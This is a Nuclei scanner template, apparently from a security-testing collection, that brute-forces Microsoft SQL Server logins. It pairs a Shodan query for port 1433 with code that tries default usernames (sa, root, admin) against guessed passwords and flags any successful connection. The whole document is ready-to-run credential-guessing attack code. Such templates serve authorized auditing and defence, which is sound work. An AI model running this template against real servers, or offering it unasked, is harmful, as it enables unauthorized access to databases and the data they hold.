id: ms-sql-brute

info:
  name: microsoft sql server(mssql) bruteforce
  author: Ice3man543,tarunKoyalwar
  severity: info
  description: |
    ms sql bruteforce templates
  metadata:
    shodan-query: "port:1433"
  
javascript:
  - pre-condition: |
      var m = require("nuclei/mssql");
      var c = m.MSSQLClient();
      c.IsMssql(Host, Port);

    code: |
      var m = require("nuclei/mssql");
      var c = m.MSSQLClient();
      c.Connect(Host,Port,User,Pass)

    args:
      Host: "{{Host}}"
      Port: "1433"
      User: "{{usernames}}"
      Pass: "{{passwords}}"
    
    payloads:
      usernames:
        - sa
        - root
        - admin
      passwords:
        - SqlServer0
        - SqlServer2021
    attack: clusterbomb

    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and